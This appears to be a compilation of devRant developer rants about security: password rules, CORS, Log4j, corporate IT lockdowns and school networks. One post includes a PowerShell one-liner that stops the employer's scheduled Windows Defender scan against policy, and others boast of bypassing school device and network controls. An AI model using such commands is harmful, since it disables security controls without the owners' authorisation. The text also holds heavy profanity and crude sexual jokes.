So many times I see devs not give a flying pancake about security. Whether it be rolling integers for sql injection or permission guarding to prevent someone executing something they shouldn't.

Why is security in this industry always the last thing to be concerned about when it's the first thing that's going to kill your business.

😓

Installed SonarQube and Snyk on the CI/CD of a 2.5 year old project that only had a linter enabled previously.

Practically zero problems found. One minor problem (same code in different branches), a few false positives, and a few possible problems in dependencies that I have no control over.

Now wondering:
Am I really that good or are those tools just shit?

Registering a new account for microsoft teams:
`Your password cannot contain a space, &# characters combination, or the following characters: < >`

Are they storing the passwords in plain text? Are they not sanitizing the input? Why the fuck would they care if I put motherfucking emojis in my password? What the fuck are you doing to the passwords, Microsoft? TELL ME.

Wtf? What kind of user agent header is that? Why don't you go ahead and insert my fucking social security number in there, Android? According to amiunique, this is literally a unique header ON ITS OWN.

So it turns out that one of our systems is so fucking old that its Log4j is off the hook. What they say of blessings being disguised as curses is real.

Love how DoD work requires sec+ certification but as you are learning the material you realize they don’t follow any procedures or practices.

I wrote an auth today.

Without frameworks. Without dependencies. Without under-the-hood magic. Without abstract pluggable adaptor modules for the third-party auth library with 63 vulnerabilities and 1252 GitHub issues. Without security vulnerabilities showing up in NPM log. Without dependency of a dependency of a dependency using md5 and Math.random() under the hood for historical reasons, and now we're fucked, because this is the only lib for our framework, and we have no time to write our own replacement. Without all that shit.

Rock-solid, on top of scrypt. Stateless and efficient.

It felt amazing.

The most annoying hack I've had to deal with was back when I did IT support, actually. Level 1 call center tech at the time. Apparently someone fell for a phishing email and gave out his outlook credentials. The phisher used that email account to send out another phishing email to roughly 1800 employees.

Security Operations noticed, because this guy's job didn't generally involve sending out mass-communication emails. They investigated, figured out what had happened, and opted for the nuclear option: they reset the password for EVERY SINGLE ACCOUNT that received the email. All 1800 of them. Over the weekend.

I walked into the call center Monday morning and checked the call stats, then did a double-take. There were over 300 people waiting in the queue. I almost left and called in sick. Turns out it wasn't that bad though. Annoying to reset so many passwords and having no downtime due to the full queue, but on the other hand my stats were better that day than any other, since every call was a 5-minute password reset.

Our school had for an open source way of dealing with home schooling and managing the school network and so on.

Now the government forced a "proprietary" system on our school and everyone hates it. The teachers didn't want it the pupils didn't want it but who cares "what we do is the best".

Btw the proprietary system costs a fuck load of money even though they just mixed many open source projects and made it their own proprietary thing.
And this company now get's loads of money for their shitty system that never really worked once since we got it.

They blocked so many ip's that we can't even access google and it's services on the school wifi and the bandwith dropped severely with the new system.

Oh and many random ip's e.g. one of my vps is accessible but the other one not.
Discord is blocked.
Web whatsapp.
And so on...

Now....

I need to learn for tests next week and need to access that stuff on the portal but...

Now they decided to switch the LDAP server to the new system and since a few hours i can't access this fucking thing.

It seems like the platform now contacts the new server which isn't even up and running....

Never change a fucking running system....

Oh and we got smart boards and it runs on android and they didn't block adb. Now i installed clash of clans on one of those things. Haha whoops.
These boards cost 7000€ and have security patches from 2 years ago....and Android 8

Hey, we need a service to resize some images. Oh, it’ll also need a globally diverse cache, with cache purging capabilities, only cache certain images in the United States, support auto scaling, handle half a petabyte of data , but we don’t know when it’ll be needed, so just plan on all of it being needed at once. It has to support a robust security profile using only basic HTTP auth, be written in Java, hosted on-prem, and be fully protected from ddos attacks. It must be backwards compatible with the previous API we use, but that’s poorly documented, you’ll figure it out. Also, it must support being rolled out 20% of the way so we can test it, and forget about it, and leave two copies of our app in production.

You can re-use the code we already have for image thumbnails even though it’s written in Python, caches nothing and is hosted in the cloud. It should be easy. This guy can show you how it all works.

Imagine: It's the year 4249.

Corporate has finally managed to convince workers that they don't need a salary.
Workers are now paid with food, shelter and clothes. And it's only in effect if you achieve your deadlines.

Keystroke monitoring softwares are now replaced with Webcam eye tracking software.

GitHub Co-Pilot now takes over your code editor and tries to dictate you how to write better code.
Refusing to do results in a signal sent to the management about your behaviour and you lose food access for the day.

HR Recruiters now require you to give them a blood sample and part of your house as a security deposit.
They also require you to have a micro-chip placed in your brain so they can monitor their worker's thought process.

Switching a job is no longer an option. You pledge allegiance to one company your entire career.

You can never see the real world now because the government has mandated you to never take off your VR glasses.
You see the world the way the government wants you to see it.

PHP is still trash.

Life is Good.

Security in defense is a joke.

New hire does not have accts set up told him over and over!

He decides to go into a classified area and just try. Common last name with first initial.

Guess what he was able to get in because no one changed the default password!

Yep now someone with an interim clearance got access to a machine that goes from unclass to secret and then top secret!

Other team lead: Hi DevOps Team, We need you to deploy this app to production. It's maintainers gave up on it in 2019, but we looked at it and it feels right.

Me: Uhm. That's not going to work. It'll fail the security scan before you can even finish the build in CI.

Other team lead: Yeah, this app is the right thing to do, and we needed it last week, but since that won't work, we'll just use this other very very infant technology that was just born yesterday. It's not stable in production, or on MySQL, or in AWS at all, but it's the other direction we can to go.

Me: What problem are you trying to solve in the first place?

Other team lead: Oh, we need access to the read from the production database.

I hate Wednesdays. Networking has the Antimalware service run a full/deep scan every Wednesday and my machine is basically unusable until it finishes.

Devs: "Can we have the scheduled task not run during the day, maybe even on the weekend?"
Gary: "Security is our #1 priority and without proper security methods in place, we'll be open to outside threats. Security begins with you, and ..blah blah blah"

Bite me Gary. I got something for ya.

Get-ScheduledTask | ? TaskName -eq 'Windows Defender Scheduled Scan' | Stop-ScheduledTask

Waiting for the floors I just mopped to dry, and I'm still thinking about migrating and if, for example, the swiss give me a good job offer, I would most likely stick around. I don't hate to stick around Europe, but it defo doesn't have any of the elements I like. (megacity, snows, English speaking, multicultural, non-torturous migration laws)

Like, I'm at that point where I'm not making enough money and want to leave (also, gaining the freedom to leave from degree soon enough) but I absolutely hate my home place (personal reasons) but they pay a crapton better, plus I can get social security benefits.

... And I want to do a phd. 😐
Someone beat some sense into me please.

One of our customers wants our mobile app to log out the user after 15 minutes of inactivity because of SeCuRiTy…

Why? The phones protect the apps with their hardware encryption from any malicious access.
And we are not dealing with super sensitive data here like some banking app or so.

Why do some people want to have bad UX for no reason?

!rant

Sometimes I think about packing up my bags and just going into security consulting just to get away from the world of being an infrastructure anarchist for software companies that are overvalued "Export to Excel" generators.

f it ain't broke, don't fix it!
I feared my Android phone's touchscreen suffered severe damage from using it in the rain, until I discovered that the 3-button navigation stopped working after an Android 12 security update (both in Nova launcher as well as in official Google Pixel launcher). Wasted time drying the unplugged phone and googling for repair options before finally wasting more time changing system settings back and forth, rebooting, changing system settings, rebooting, etc.
Remember those happy times before mobile phones have been invented, which of course I don't really want back either. I just want developers to stop breaking features that used to work. Regression testing outside the happy path, anyone? I mean, it's not a hacked maker project, it's a commercial phone that I bought and intend to use with the latest official software. Don't want to think about the next breaking changes that Android 13 might bring.

What the fresh hell is this?

Security bug reported 7 years ago!
this is how architect will cover up.. (4)

I have to add an endpoint to integrate an API and I want to vomit when I think about this major security issue they introduce.

What type of prehistoric dumbass thought GET requests with username and password in the query parameters is a good idea to burden your partner with.

Does someone know a site where i can get professional level help/guides/tutorials with system architecture questions? Like best practices for implementing common features? (Something like stackoverflow but where u actually get an answer instead of insults)

Googling for tutorials gives very basic/demo level results that might not be great for scale/security in prod env

At the beginning of the last year of university a new flatmate arrived. His father dropped him at the apartment and then called me asking for the Wi-Fi password.

I told him I could not remember it on the spot and I would tell it to his son later.

I actually remembered it very well and I could say I didn’t tell him because of security reasons …

Actually I was embarrassed to say on phone: “PubesRule!”

The password was actually decided by a previous flatmate…😅

This was initially a reply to a rant about politics ruining the industry. Most of it is subjective, but this is how I see the situation.

It's not gonna ruin the industry. It's gonna corrupt it completely and fatally, and it will continue developing as a toxic sticky goo of selfishness and a mandatory lack of security until it chokes itself.

Because if something can get corrupted, it will get corrupted. The only way for us as a species to make IT into a worthy industry is to screw it up countless times over the course of a hundred years until it's as stable and reliable as it can possibly be and there are as many paradigms and individually reasonable standards as there can possibly be.

Look around, see the ridiculus amount of stupid javascript frameworks, most of which is just shitcode upon vulnerabilities upon untested dependencies. Does this look to you like an uncorrupted industry?

The entire tech is rotting from the hundreds of thousands of lines of proprietary firmware and drivers through the overgrown startup scene to fucking Node.js, and how technologies created just a few decades ago are unacceptable from a security standpoint. Check your drivers and firmware if you can, I bet you can't even see the build dates of most firmware you run. You can't even know if it was built after any vulnerability regarding that specific microcontroller or whatever.

Would something like this work in chemical engineering? Hell no! This is how fucking garage meth labs work, not factories or research labs. You don't fucking sell people things without mandatory independent testing. That's how a proper industry works. Not today's IT.

Of course it's gonna go down in flames. Greed had corrupted the industry, and there's nothing to be done about it now but working as much as we can, because the faster we move the sooner we'll get stuck and the sooner we can start over on a more reasonable foundation.

Or rely on layers of abstraction and expect our code to be compilable on anything the future holds for us.

New job. Almost all sites are blocked due to "security"... even spotify. I can' listen to the music. Fortunately i have access to dev rant xd

CORS is shit
Stupid useless shit that protects from nothing. It is harmful mechanism that does nothing but randomly blocks browser from accessing resources - nothing more.

Main idea of CORS is that if server does not send proper header to OPTIONS request, browser will block other requests to that server.

What does stupid cocksuckers that invented CORS, think their retarded shit can protect from?
- If server is malicious, it will send any header required to let you access it.
- If client has malicious intents - he will never use your shit browser to make requests, he will use curl or any ther tool available. Also if server security bases on something as unreliable as http headers it sends to the client - its a shit server, and CORS will not save it.

Can anyone give REAL examples when CORS can really protect from anything?

Salesforce lightning web components have such bullshit limitations that they claim is because of security but it's just because it's overengineered garbage.

Want to use web components? Nope.

Want to pass in a value to a function in a click listener expression? Nope.

Want to use scss? Nope, compile it to css yourself.

Want to use the fucking document object? Guess what it's overridden except for very specific third party frameworks.

Who in the fuck thought it was a good idea to override the document object? Your app isn't more secure, literally the entire internet uses the document object and it still becomes available in runtime anyway so what the fuck??

LWC is the biggest garbage I've ever seen, you know a framework's a big red flag when there are developers solely for the framework.

There is a new security release coming out that apparently removes some of these nuances (understatement) so there might be some light at the end of the tunnel.

I fucking hate Google, but made the decision to use it as my primary search engine once again.

Reality dictates that I have already adopted it for well over a decade via searches since AllTheWeb existed along with owning enough Android devices to choke a twelve headed dragon whore.

But, here's the main reason: You.com and DuckDuckGo are so dumb as fuck, they might as well be Ron Jeremy's MySpace page.

You.com, for instance, is "completely customizable" by adding un-customizable "apps" without any control over the content it spews into your SERPS.

Neither seems to have interest in no longer padding results with shit you'd take a knife to. At least Google allows me to block those pages or sites from being seen again.

If you happen to live on Planet Earth (which currently seems to exclude 86.8% of the human population) you've been tracked before you even knew what "Big Brother" meant.

If you're looking to safeguard your security, buy a goddamn sword and time travel to remove the Zuckerberg timeline from existence.

My org (of which i'm basically CTO) has this administrative tool that a team uses to combat spam and scams, which is quite the problem for us.. the tool was written like 9 years ago, by my predecessor, very quick & dirty and unaesthetic and without input from those who would use it as far as interface or UX... it got modded a little a few years later by a kind of amateur coder who was at the time on the spam control team, and now there's this new maybe slightly less amateur coder guy on the team who has written this amateur tool that scrapes data off our site and massages it and stores it on his own server and then provides a better interface, or so they say.... this is all because for a couple of years people didnt want to "bother me" with a request to improve our internal tool, they thought I was "too busy" doing other things... so instead this outsider has built this stupid thing that lives on his own personal server and so now we have these problems to do with performance, security, privacy for user info, etc etc... someone please shoot me....

Dependency hell is the largest problem in Linux.

On Windows, I just download an executeable (.exe) file, and it just works like a charm! But Linux sometimes needs me to install dependencies.

At one point, I nearly broke my operating system while trying to solve dependencies. I noticed that some existing applications refused to start due to some GLIBC error gore. I thought to myself "that thing ain't gonna boot the next time", so I had to restore the /usr/lib/x86_64-linux-gnu/ folder from a backup.

And then there is a new level of lunacy called "conflicting dependencies". I never had such an error on Windows. But when I wanted to try out both vsftpd and proFTPd on Linux, I get this error, whereas on Windows, I simply download an .exe file and it WORKS! Even on Android OS, I simply install an APK file of Amaze File Manager or Primitive FTPd or both and it WORKS! Both in under a minute. But on Linux, I get this crap. Sure, Linux has many benefits, but if one can't simply install a program without encountering cryptic errors that take half a day to troubleshoot and could cause new whack-a-mole-style errors, Linux's poor market share is no surprise.

Someone asked "Why not create portable applications" on Unix/Linux StackExchange. Portable applications can not just be copied on flash drives and to other computers, but allow easily installing multiple versions on a system. A web developer might do so to test compatibility with older browsers. Here is an answer to that question:

> The major argument [for shared libraries] is security, that if there is a vulnerability in a commonly-used library, then only that library has to be updated […] you don't have to have 4 different versions of a library installed

I just want my software to work! Period. I don't mind having multiple versions of libraries, I simply want it to WORK! To hell with "good reasons" for why it doesn't, and then being surprised why Linux has a poor market share. Want to boost Linux market share? SOLVE THIS DAMN ISSUE!.

Understand that the average computer user wants stuff to work out of the box, like it does in Windows.

I dont understand the Log4j vulnerability.

Isnt the ability to execute code a feature they added so that you can add dynamic data to the logs?

If it is a feature then isnt it written in the documentation?

Is the problem that a lot of companies forgot to sanitize the input before logging it?

I don't care about market cap. Stick your hype-driven business practices up your ass. Infinite growth doesn't exist. I won't read your fucking books and attend your fucking bootcamps and MBAs. You don't have a business model. Selling data is not a business model. Fuck your quick-flip venture capital schemes, and especially fuck your “ethics”.

I will be the first alt-tech CEO. I only care about revenue. The real money, not capitalization bubble vaporware. You don't need a huge fleet of engineers if you're smart about your technology, know how to do architecture, and you're not a feature creep. You don't need venture capital if you don't need a huge fleet of engineers. You don't need to sell data if you don't need venture capital. See? See the pattern here?

My experience allows me to build products on entirely my own. I am fully aware of the limitations of being alone, and they only inspire lean thinking and great architectural decisions. If you know throwing capacity at a problem is not an option, you start thinking differently. And if you don't need to hire anyone, it is very easy to turn a profit and make it sustainable.

If you don't follow the path of tech vaporware, you won't have the problems of tech vaporware, namely distrust of your user base, shitty updates that break everything, and of course “oops, they raised capital, time to leave before things go south”.

A friend of mine went the path I'm talking about, developed a product over the course of four years all alone, reached $10k MRR and sold for $0.8M. But I won't sell. I only care about revenue. If I get to $10k MRR, I will most likely stop doing new features and focus on fixing all the bugs there are and improving performance. This and security patches. Maybe an occasional facelift. That's it. Some products are valued because they don't change, like Sublime Text. The utility tool you can rely on. This is my scheme, this is what I want to do in life. A best-kept secret.

Imagine 100 million users that hate my product but use it because there are no alternatives, 100 people in data enrichment department alone, a billion dollars of evaluation (without being profitable), 10 million twitter followers, and ten VC firms telling me what to do and what data to sell.

Fuck that. I'd rather have one thousand loyal customers and $10k MRR. I'm different, some call it a mental illness, but the bottom line is, my goals are beyond their understanding. They call me crazy. I won't say it was never about the money, of course it was, but inflating your evaluation is not “money”. But the only thing they have is their terrible hustle culture lives and some VC street wisdom, meanwhile I HAVE products, it is on record on my PH. I have POTDs, I have a fucking Golden Kitty nomination on health and fitness for a product I made in one day. Fuck you.

Laziest habit? Anything done between 1pm-4:30pm and 4:59pm-8pm. During that time, habits include unnecessary refactoring, poking the CI/CD containers, editing already made prototypes in gimp inkscape, pasting stackoverflow topics to youtube, bouncing from macOS, windows and kde distros in search of zen/rice, adding a calendar emoji on my slack :), making useless automation scripts, building on every variable's value change, tinkering pixels, shades, gradients (and their angles), dimens, anim values, anim curves, opacity, blurs and just nuking the ui just to copy paste an old one, 60% just chatting in code alongs, changing key bindings (from ide to OS), and ultimately zoning out on a podcast about cyber security. And of course: waiting for ++ and comments

Work on a large project that was interesting with total job security until retirement

Yesterday, the Project Manager forwarded an email from a staff member who worked on a donations campaign. Staff member was confused about a Cloudflare challenge that appeared before the user was sent to the donation page. It’s a less than 5 second JavaScript check. He thought it looked fishy.

I had to explain that it’s a security measure that’s been up for almost a month. PM knows this but left it to me to explain because ownership of the site is on me. The donations page and api gets hit by a lot of bots because it’s a public api and there are no security measures like captchas to deter the bots. I’m inheriting this website and I didn’t build it.

Staff member says other staff want to know if the Cloudflare page can be customized so it looks more legit. Um, Cloudflare is a widely known legit service. Google it.

A few thoughts pop into my head:

1. Engineering communicated to stakeholders about the Cloudflare messaging a month ago.

2. Wow, stakeholders don’t share relevant info with their staff who aren’t on these emails.

3. Woooow, stakeholders and staff don’t look at the website that often.

A customer specialising in identification and security solutions called today, claiming "they" found malware on their website. Then they provided a weird link to some shady malware scanner, and the "malware" turned to be a <noscript> tag which adds ?noscript to the page url, so we can serve no-JS optimised content. As a bonus, the scanner only detected it on two URLs, even though every single page on the site contains that same line of code.

Joke's on them, have fun paying for priority support outside of the business hours for nothing.

IT admins of devRant, explain my dumbass the following:

Why would an IT department put servers in a VPN without TLS.

They presume they don't need because muh-VPN.

And then they don't want to hand out VPN connections to anyone and force me to use Citrix RDP 🤡

I know there are security reasons, but is there not a better way? Like goteleport.com ?

Asking for a friend (or several)

I'm trying to reach Alice but none of my messages get through. Maybe Eve has something to do with it 🤔

Project with partner company, during the meeting I asked them how can we secure the communication between two services. I suggested api keys, tokens. They were like nope, no need. But I asked them for their IPs to do whitelisting on our side in Nginx.

But their side, nah not even whitelisting, no tokens, no validations. If one has address, can send anything from anywhere.

How hard would it be to do at least, AT LEAST simple token validation. And they are using the very old IIS server. I think for them as long as data flows in as expected, it is fine.

I was on Instagram and I saw a boy advertising to sell 5k followers and I was wondering, how do they do that? Can they programmically create and control those accounts? I know they can use the Instagram API to some degree but I feel like Instagram probably has security set up to detect that type of stuff (5k accounts following someone at the same time, etc). Does anybody know? I’m actually really curious

Jesus christ I need my VP and CIO to get their hands out of Azure and GCP and just let me work.

Yes, governance and security and IAM are big deals. That's why you have infraops people like me to deal with that.

I'm literally working with one hand tied behind my back because just about every button press or CLI command I need to do my damn job as a professional cloud fluffer requires me to go bother an executive and ask permission to pretty please can I deploy a new container, can you go press the shiny button? No not that one, move your mouse up...up..now UP..ok over lef-no..can I have mouse control? Sigh fine, do you see where it says "Approvers", no that says "Release Pipeline"

Look I actually kinda like this job, I do, in as much as when I have something to do I get left the fuck alone to do it. Meetings are minimal, aside from the odd days when one of our app services decides to yeet itself into the river Styx, there's little distractions.

Yeah, developers do dumb shit but that's probably best left to the notion of job security and never talked about again less they go to HR and complain that the ops guy was very stern and direct and made the developer take some accountability for their work product.

AND YET

It's so intergalactically stupid that I have to go ask permission just to do ops tasks by the same people barging down my goddamn door asking why the ops task isn't done yet.

"Because you won't give me permissions in GCP to actually DO anything".

Okay. Rant over. Time for lunch. Good meeting, see you all at the holiday party.

Real conversation with my shit bank
Me: Hey, I want to change the phone number associated with my card because I no longer have access to it. (aka stolen). I can't find the option to do so on your website anymore.
Them: Yeah, for security reasons you now have to come down to the bank (which involves standing in line for anywhere between 40 minutes and 2 hours) to do that simple change.

The actual fuck.

Any of us had annoyances with people with “a million dollar app idea” but what about these which gives unsolicited career advice?

I’m dealing with a boomer which keeps trying me to change my career and work into cyber security (because TV told him it’s a well paid field) despite me kindly telling him for multiple times which it’s not going to happen because I won’t throw away a career I love to work in a field which seems deadly boring to me (I love anything about coding from design to typing for hours on Vim meanwhile the only thought of reading for hours obscure documentation to find potential vulnerabilities on a system kills my spirit).

Play Store's $25 registration fee - for getting PWA listed in their shitty catalogue? Who in the right mind would even jump in this clusterfuck of store to find a *web* app? For all you know, Google, there is such thing as QR codes - and customers can just scan the code (or type in that sweet address). Voila! Boom!!! Ching-ching!

Hello-hello, monopolistic cashgrabage! I came to inform you that your TWA bullshit is unneeded in ETHICAL space. The only ones who would benefit from this thing are permission-hungry publishers. And I'm already sick of this culture where people are put into store bubbles. You can't hide the fact that this data and features you provide, with "native" layer, may be misused in a jiffy - and by big players, no less. Of course, as a vile dumpster that you are, you don't mind it.

Don't even bring up a battery consumption that comes with PWA and browser. This doesn't matter if you use an app for some 2 minutes to tick your mental checkboxes! I'm just sick of app stores and native apps that collect the data without normal warning, and dare to take more than 1 second to fucking load the cached data. Take a lesson or two from PWAs that collect (probably useful) cache, instead of my specs, and load almost instantly.

Client be like:
Pls, could you give the new Postgres user the same perms as this one other user?

Me:
Uh... Sure.

Then I find out that, for whatever reason, all of their user accounts have disabled inheritance... So, wtf.

Postgres doesn't really allow you to *copy* perms of a role A to role B. You can only grant role A to role B, but for the perms of A to carry over, B has to have inheritance allowed... Which... It doesn't.

So... After a bit of manual GRANT bla ON DATABASE foo TO user, I ping back that it is done and breath a sigh of relief.

Oooooonly... They ping back like -- Could you also copy the perms of A on all the existing objects in the schema to B???

Ugh. More work. Lets see... List all permissions in a schema and... Holy shit! That's thousands of tables and sequences, how tf am I ever gonna copy over all that???

Maybe I could... Disable the pager of psql, and pipe the list into a file, parse it by the magic of regex... And somehow generate a fuckload of GRANT statements? Uuuugh, but that'd kill so much time. Not to mention I'd need to find out what the individual permission letters in the output mean... And... Ugh, ye, no, too much work. Lets see if SO knows a solution!

And, surprise surprise, it did! The easiest, simplest to understand way, was to make a schema-only dump of the database, grep it for user A, substitute their name with B, and then input it back.

What I didn't expect is for the resulting filtered and altered grant list to be over 6800 LINES LONG. WHAT THE FUCK.

...And, shortly after I apply the insane number of grants... I get another ping. Turns out the customer's already figured out a way to grant all the necessary perms themselves, and I... No longer have to do anything :|

Joy. Utter, indescribable joy.

Is there any actual security reason for disabling inheritance in Postgres? (14.x) I'd think that if an account got compromised, it doesn't matter if it has the perms inherited or not, cuz you can just SET ROLE yourself to the granted role with the actual perms and go ham...

See emojis in terminal? Get ready to get 728 dependency security warnings.

Sometimes I really hate offshore desktop support... yes I know Visual Studio 15 was installed, and works. But now Python tools was uninstalled in a forced update that corrupted my VS and now I can't install PTVS(not that I need VS has the vim emulator that I can install at work, it's a whole mess of weird security policies.) fucking hate windows and visual studio. Fucking listen what Im telling you the issue is. I need your dumbass to uninstall this shit software so I can do a clean install since the shitty as software management system doesn't so shit when it say's "uninstalling".

On a side note, this fuckwit just tried to explain what the screenshot tool and how to use it... it's only pinned to my taskbar and menu for shits and gigs since I don't use it everyday to tell the stupid data entry analysts I deal with to fuck off.

Origin, the game thingy that launches other games..

Not a huge fan, but I've built up a small game collection from special offers/freebies/etc.

But every now and then, this happens:

For years..

Why can't they fix their shit !

Meanwhile, trying to log in with Ubisoft connect..

Their, 2 stage security wants to send me an email, great !

Only, before I can read the email, it says:

"Session has expired due to inactivity, please log in again."

I wasn't inactive, I was checking my bloody email you bastard !

F*ck you CircleCi

Please share your thoughts on Dependabot security alerts on Github, more specifically for NPM packages in package-lock.json.

In 99% of cases I've found them useless as:
- package-lock.json is in the repo, but not in the NPM package (=no value to users)
- most of the updates relate to devDependencies (=no value to users)
- it clutters the git history (and changelog if it is auto-generated) with a batch of patch updates (updated depx to .1, .2, .3) while the only important thing in the next release notes is the delta (updated depx from .1 to .3) (=no value to users)

After brute forced access to her hardware I spotted huge memory leak spreading on my key logger I just installed. She couldn’t resist right after my data reached her database so I inserted it once more to duplicate her primary key, she instantly locked my transaction and screamed so loud that all neighborhood was broadcasted with a message that exception is being raised. Right after she grabbed back of my stick just to push my exploit harder to it’s limits and make sure all stack trace is being logged into her security kernel log.
Fortunately my spyware was obfuscated and my metadata was hidden so despite she wanted to copy my code into her newly established kernel and clone it into new deadly weapon all my data went into temporary file I could flush right after my stick was unloaded.
Right after deeply scanning her localhost I removed my stick from her desktop and left the building, she was left alone again, loudly complaining about her security hole being exploited.
My work was done and I was preparing to break into another corporate security system.
- penetration tester diaries

On the topic of having to make decisions as a dev that shouldn’t be made (solely, at least) by devs…

There’s a lot to like in my current work environment: I enjoy being around my colleagues, I get to do a variety of tasks, and many of them interesting to me and/or great learning opportunities, the pay doesn’t suck and so on… there’s also not much pressure put on the dev team from other parts of the organisation. The flipside of the coin is that nobody who should express some kind of vision as to how we should develop the product further does so.

Me and my fellow devs in the team are so frustrated about it. It feels like we’re just floating around, doing absolutely nothing meaningful. It’s as if the business people just don’t care. And we are the ones ending up deciding what features to develop and what the specs are for those etc. and I really don’t think we should be the ones doing that.

One would think that’s a great opportunity to work on refactoring, infrastructure, security and process improvements and so on - but somehow we get bothered just enough by mundane issues we can’t get to work on those effectively. Also, many of the things we’d want to do would need sign-off from the management, but they are not responsive really. Just not there. Except for our TM, but they don’t have the power neccessary… at least they are trying tho…

How do you like to develop through a VM through a VPN to another continent? Because it seems one of our clients is about to enforce such a model.... due to security reasons...

Currently having very funny project lead, who gives on the spot estimates for 9 years old very pathetic quality code having Android app in security domain. Memory leaks, bad practices, typos, CVEs etc. you name it we have it in our source of the app.

Since 5-6 sprints of our project, almost 50% of user stories were incomplete due to under estimations.

Basically everyone in management were almost sleeping since last 7-8 years about code quality & now suddenly when new Dev & QA team is here they wanted us to fix everything ASAP.

Most humourous thing is product owner is aware about importance of unit test cases, but don't want to allocate user stories for that at the time of sprint planning as code is almost freezed according to him for current release.

Actually, since last release he had done the same thing for each sprint, around 18 months were passed still he hadn't spared single day for unit testing.

Recently app crash issue was found in version upgrade scenario as QAs were much tired by testing hundreds of basic trivial test cases manually & server side testing too, so they can't do actual needful testing & which is tougher to automate for Dev.

Recently when team's old Macbook Pros got expired higher management has allocated Intel Mac minis by saying that few people of organization are misusing Macbooks. So for just few people everyone has to suffer now as there is no flexibility in frequent changing between WFH & WFO. 1 out of those Mac minis faced overheating & in repair since 6 months.

Out of 4 Devs & 3 QAs, all 3 QAs & 2 Devs had left gradually.

I think it's time to say goodbye 😔

I always hated in school computing lessons when the teachers pet students would snitch on you for getting around the school network stuff.

Many people in the lesson would always play games instead of doing what they were meant to. So the teacher turned off the internet in the room using the admin control stuff. Then when I found a way around it all so I could watch some educational YouTube videos, the stupid teachers pet would snitch on me. Luckily the teacher knew I wasn’t using it to mess around, always felt good when he said that I could access it because I’m the biggest security threat to the school.

Did you ever have issues with snitches in computing lessons?

Thoughts after a security conference.

The private sector, no matter the size, often plays a role (e.g. entry vector, DDoS load generating botnet, etc.) in massive, sometimes country-wide attacks. Shouldn't that make private businesses' CyberSec a matter of national security? Shouldn't the government create and enforce a security framework for private businesses to implement in their IT systems? IMO that'd also enforce standardised data security and force all the companies treat ITSec with at least minimal care (where "minimal" is set by the gov)

What are your thoughts?

Was working on a high priority security feature. We had an unreasonable timeline to get all of the work done. If we didn’t get the changes onto production before our deadline we faced the possibility of our entire suit being taken offline. Other parts of the company had already been shut down until the remediations could be made -so we knew the company execs weren’t bluffing.

I was the sole developer on the project. I designed it, implemented it, and organized the efforts to get it through the rest of the dev cycle. After about 3 month of work it was all up and bug free (after a few bugs had been found and squashed). I was exhausted, and ended up taking about a week and a half off to recharge.

The project consisted of restructuring our customized frontend control binding (asp.net -custom content controls), integrations with several services to replace portions of our data consumption and storage logic, and an enormous lift and shift that touched over 6k files.

When you touch this much code in such a short period of time it’s difficult to code review, to not introduce bugs, and _to not stop thinking about what potential problems your changes may be causing in the background_.

I love my Mac but damn, most MacOS releases are so damn useless, I won't do a major OS overhaul (updating from Big Sur to Montrey) just to get Share Play and the opportunity to watch movies together with my few Mac using friends, I don't need those fucking marketing driven bells and whistles, just give me a stable UNIX base an efficient and good looking UI and regular security patches and I'm good.

I would be happy to keep using Mavericks but without yearly MacOS release how Apple would be able to convince normies to replace their 10 years old MacBooks?

The it manager said that the site on my private vps where we are using a small tool as reference, is a security issue and what if it may be hacked... Well, from this point of perspective all the websites shall be switched off. The tool lovered the problem resolution from 30 to 2 minutes.. I have asked for on premise server before but noone gave a shit so I hosted on my private vps. I wont give it back for free, its a sure thing. Soon they will start to get the complains that its offline because the customer is using it for debugging too. I feel like IT and dev is really moving appart. They act as bunch of pathetic jelous guys who couldn't learn programming and ended up in installing windows on machines...

Welp, Guess I'm back after almost 3 years. I graduated and can now officially call myself a network & security engineer.

Thats top notch design.
All actions happening on the page go to one endpoint. Removing old trusted computers, changing the password, changing 2FA, you name it.

Now if you want to remove all old trusted devices, you cannot remove all at once, there is no button for it. So you click one after the other. And then it stops working. Ok, then do the normal password rotation. Hmm, button has a loading spinner and then nothing happens.

Looking into the browser console:
- All requests go to /myaccount/security/graphql
- All requests get a 429 Too many requests
- Even if you just click a panel, it tracks the action to the graphql endpoint. Or at least tries to because even that gets shot down with a 429

Pretty dumb, eh? Must be some small shitty website. It's not. It's fucking paypal.

We should find a way to replace passwords: any password manager which I tried is inaccurate in identifying login forms and is too hard to use for non technical people older than 40 and convince people to not use some stupid name + birth year combination as their passwords is a frustrating uphill battle.

I have 2FA enabled on NPM so it would shut up about it, the recovery codes are in my password manager, right next to my secure randomly generated password.

Password authentication is fucking stupid.

*Frustrated user noises* Whyyyy, Grafana, why don't you implement any actual query forgery checks?!

So long as a user has access to the Grafana frontend, they can happily forge the requests going off to the backend, and modify them to return *whatever* data they want from the datasource.

No matter that they're a read-only user. That only stops them from modifying the dashboard definitions on the frontend, but doesn't enforce any sort of immutability on the BE...

If anyone had any tips on how to further secure it, I'm curious...

Your face when a customer's manager shares the credentials to at least five different production environment databases and third party services, in their project management platform (making them accessible to the entire organization) because they want to be a developer when they grow up.

Mark Russinovich, the chief technology officer of Microsoft Azure, says developers should avoid using C or C++ programming languages in new projects and instead use Rust because of security and reliability concerns.

Client's IT department is fine about giving me a laptop for exclusive access to their VPN, security reasons, etc. Ok, fine I get it.

But they do not want to give me a Linux machine - only Windows!

How am I supposed to get shit done.

So i have been thinking..
SQL is a lang that runs on a specific software on the server, and helps creating data stores(databases and tables) that can be queried & manipulated.

is there a way to run sql like queries on the client side with no interaction from backend at all?

Say i have 5 inter related data models. in a backend world, they will form nice little tables of a db with all their joins and composite keys. from the server, i shall be querying them like "SELECT name from x where y=z & ..."

but what if i could store them like tables in browser memory and run the same query filters via a query language... is this possible?

i know this poses a certain security risk, but we already use cookies, local storage and a lot of json based shitty client side storages. surely it might be possible to have a lesser optimised sql tables on the frontend with extremely good querying capabilities?

or am i talking something far fetched here?

context i am 20 y/o student studying in mumbai uni college

SO RECNTLY I GRABBED A INTERNSHIP AT A BIG SOFTWARE COMPANY AS A SDE INTERN

so before all this i was that guy of college who was never been invited to parties or nightouts as i am not from a rich Bg they used to tease me on my style of clothing how i used to talk my english is fluent still i used to get bullied. I just had this female friend of mine which everytime used to support me let it be Leetcode question staying up late with me for studies but she was also teased because of me as i was not from a well known family or had money to show flashy things... she was so happy when i got this internship

